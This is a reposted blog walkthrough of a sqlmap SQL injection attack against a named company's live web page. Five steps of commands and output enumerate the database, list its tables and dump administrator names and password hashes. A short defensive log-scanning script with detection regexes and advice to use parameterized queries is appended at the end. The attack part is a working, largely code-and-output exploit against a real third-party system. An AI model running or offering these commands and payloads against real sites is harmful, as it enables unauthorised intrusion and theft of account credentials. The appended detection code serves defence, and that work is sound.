url:
http://www.microtek.com.cn/happystudy/happystudy_info.php?idnow=4
Step 1:
-u <injection URL> --dbms "Mysql" --current-user
Get the current user name
[root@Hacker~]# Sqlmap -u http://www.microtek.com.cn/happystudy/happystudy_info.php?idnow=4 --dbms "Mysql" --current-user
Answer y at the y/n prompts to get the result
sqlmap identified the following injection points with a total of 17 HTTP(s) requests:
---
Place: GET
Parameter: idnow
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: idnow=4 AND 8576=8576
Type: UNION query
Title: MySQL UNION query (NULL) - 8 columns
Payload: idnow=4 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a71696d3a,0x586d766645564446784b,0x3a68706b3a), NULL, NULL, NULL, NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: idnow=4 AND SLEEP(5)
---
web application technology: Apache 2.2.16, PHP 5.2.17
back-end DBMS: MySQL 5.0.11
current user: 'zjmall@localhost'
Result of step 1:
Got the user name zjmall
Step 2:
Get the current database name
[root@Hacker~]# Sqlmap -u http://www.microtek.com.cn/happystudy/happystudy_info.php?idnow=4 --dbms "Mysql" --current-db
Result of step 2
current database: 'xbase'
This is the database name
Step 3:
-u <injection URL> --dbms "Mysql" --tables -D "xbase"
where "xbase" is the database name
Get all table names in the current database
[root@Hacker~]# Sqlmap -u http://www.microtek.com.cn/happystudy/happystudy_info.php?idnow=4 --dbms "Mysql" --tables -D "xbase"
Result of step 3
+---------------------------------------------+
| address_book |
| address_format |
| admin |
| admin_files |
| admin_groups |
| awards |
| banners |
| banners_history |
| block_p |
| card |
| categories |
| categories_description |
| cdb_announcements |
| cdb_attachments |
| cdb_banned |
| cdb_buddys |
| cdb_favorites |
| cdb_forumlinks |
| cdb_forums |
| cdb_karmalog |
| cdb_members |
| cdb_pm |
| cdb_poll |
| cdb_posts |
| cdb_searchindex |
| cdb_sessions |
| cdb_settings |
| cdb_smilies |
| cdb_stats |
| cdb_styles |
| cdb_stylevars |
| cdb_subscriptions |
| cdb_templates |
| cdb_threads |
| cdb_usergroups |
| cdb_words |
| channel_user |
| christmas |
| cms_ad |
| configuration |
| configuration_group |
| copyright |
| counter |
| counter_area |
| counter_browser |
| counter_daily |
| counter_day |
| counter_detail |
| counter_history |
| counter_month |
| counter_year |
| countries |
| currencies |
| customers |
| customers_basket |
| customers_basket_attributes |
| customers_info |
| data |
| detail |
| detail3 |
| detail_str |
| doa_info |
| doa_info_old |
| doa_products |
| doa_user |
| download |
| downloadccccc |
| driver_download |
| driver_faq |
| driver_faq_sort |
| driver_os |
| driver_os_old |
| driver_products |
| enter |
| faq |
| faq1 |
| fenleibiao |
| fujialm |
| geo_zones |
| hp_gb |
| hp_newscontent |
| hp_newstitle |
| imgupload |
| integral |
| languages |
| log_time |
| magazine |
| mail |
| manufacturers |
| manufacturers_info |
| mpcaward |
| newsletters |
| orders |
| orders_products |
| orders_products_attributes |
| orders_products_download |
| orders_status |
| orders_status_history |
| orders_total |
| other_download |
| other_download_old |
| pagecontent |
| pdbmb |
| phpbb_themes_name |
| probase |
| products |
| products_attributes |
| products_attributes_download |
| products_description |
| products_firstpage_show |
| products_notifications |
| products_options |
| products_options_values |
| products_options_values_to_products_options |
| products_to_categories |
| projector |
| question2 |
| question_classify |
| question_ok |
| question_user |
| question_wait |
| reviews |
| reviews_description |
| rma_info |
| salable |
| sanbaoka |
| sessions |
| software_xz |
| specials |
| study |
| study09 |
| study2014 |
| study_sort |
| sypdb |
| sytpb |
| tax_rates |
| tb_admin |
| tb_adurl |
| tb_code |
| tb_productbase |
| tb_productcapability |
| tb_search |
| tb_search_sort |
| tb_type |
| tb_type201503 |
| tb_user |
| tcpdlb3 |
| tcptpb |
| tfzcpb |
| tggxnb |
| tggxxb |
| thc |
| tips |
| title_pic |
| tjgxxb |
| tjxcb |
| total |
| total201505 |
| town |
| tv_show |
| txcxxb |
| txmtpb |
| txpfj |
| tygb |
| user2 |
| user_base |
| userinfo |
| wenjuan |
| whos_online |
| window |
| wxzd_products |
| wxzd_station |
| wxzd_station2014 |
| wxzk_sation2014_7 |
| zones |
| zones_to_geo_zones |
+---------------------------------------------+
Sensitive table name -- admin
Step 4:
-u <injection URL> --dbms "Mysql" --columns -T "admin" -D "xbase"
where "admin" is the table name
Get all columns in the current table
[root@Hacker~]# Sqlmap -u http://www.microtek.com.cn/happystudy/happystudy_info.php?idnow=4 --dbms "Mysql" --columns -T "admin" -D "xbase"
Result of step 4
Database: xbase
Table: admin
[10 columns]
+---------------------+-------------+
| Column | Type |
+---------------------+-------------+
| admin_created | datetime |
| admin_email_address | varchar(96) |
| admin_firstname | varchar(32) |
| admin_groups_id | int(11) |
| admin_id | int(11) |
| admin_lastname | varchar(32) |
| admin_logdate | datetime |
| admin_lognum | int(11) |
| admin_modified | datetime |
| admin_password | varchar(40) |
+---------------------+-------------+
Sensitive columns
admin_password
admin_email_address
admin_firstname
Step 5:
-u <injection URL> --dbms "Mysql" --dump -C "admin_email_address,admin_firstname,admin_password" -T "admin" -D "xbase" -v 0
where "admin_email_address,admin_firstname,admin_password" are the column names in the table
Get the contents of those columns
[root@Hacker~]# Sqlmap -u http://www.microtek.com.cn/happystudy/happystudy_info.php?idnow=4 --dbms "Mysql" --dump -C "admin_email_address,admin_firstname,admin_lastname,admin_password" -T "admin" -D "xbase" -v 0
Result of step 5
+-------------------------------------+----------------+-----------------+---------------------+
| admin_password                      | admin_lastname | admin_firstname | admin_email_address |
+-------------------------------------+----------------+-----------------+---------------------+
| abb54e54d8506963266a299868b416f0:1a | Lee            | Roy             | [email protected]   |
| 4b53fdaeaa03382e1c6e190416807892:4d | Administrator  | Store           | [email protected]   |
| 73b1911cf444c08c46a549a6a10a690c    | sdf            | a               | [email protected]   |
+-------------------------------------+----------------+-----------------+---------------------+
It looks like admin_lastname is the account name,
or admin_email_address is the account name (I did not test it).
A walkthrough of one sqlmap run
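From the defender's side, the three injection classes sqlmap reported in step 1 (boolean-based blind, UNION query, time-based blind) leave recognisable traces in the web server's access log. The following detection script is an added example, not part of the original post: it runs over constructed Apache-style log lines (the IPs, timestamps and sizes are made up) that carry the same payload shapes and groups the hits per client, which is how an analyst spots one source cycling through every technique within seconds.

```python
import re
from urllib.parse import unquote_plus
# Constructed Apache combined-style access-log lines (not from the original page); the
# query strings reproduce the three payload classes sqlmap reported above, URL-encoded.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2020:10:00:01 +0800] "GET /happystudy/happystudy_info.php?idnow=4 HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2020:10:00:02 +0800] "GET /happystudy/happystudy_info.php?idnow=4%20AND%208576%3D8576 HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2020:10:00:03 +0800] "GET /happystudy/happystudy_info.php?idnow=4%20LIMIT%201,1%20UNION%20ALL%20SELECT%20NULL,%20CONCAT(0x3a71696d3a,0x586d766645564446784b,0x3a68706b3a),%20NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL%23 HTTP/1.1" 200 5300
10.0.0.5 - - [01/Jan/2020:10:00:09 +0800] "GET /happystudy/happystudy_info.php?idnow=4%20AND%20SLEEP(5) HTTP/1.1" 200 5120
10.0.0.7 - - [01/Jan/2020:10:00:10 +0800] "GET /happystudy/happystudy_info.php?idnow=12 HTTP/1.1" 200 4800
"""

# Fields of one access-log line: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# One signature per injection class in sqlmap's report, applied to the URL-decoded query.
SIGNATURES = [
    ("boolean-based blind", re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I)),   # AND 8576=8576
    ("UNION query",         re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b.*\bNULL\b", re.I)),
    ("time-based blind",    re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I)),    # AND SLEEP(5)
]

def classify_query(raw_query):
    """Names of the signatures matching a still-URL-encoded query string."""
    decoded = unquote_plus(raw_query)
    return [name for name, rx in SIGNATURES if rx.search(decoded)]

def scan_log(text):
    """Return (ip, path, matched_signatures) for every request that trips a signature."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        matched = classify_query(query)
        if matched:
            hits.append((m.group("ip"), path, matched))
    return hits

def summarize(hits):
    """Signature classes seen per client IP; one IP hitting all three is a scanner footprint."""
    by_ip = {}
    for ip, _path, matched in hits:
        by_ip.setdefault(ip, set()).update(matched)
    return by_ip
```

The signatures are deliberately narrow; in production they belong alongside a parameterized-query fix in happystudy_info.php, not instead of it.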
Reposted from blog.csdn.net/wxh0000mm/article/details/91972017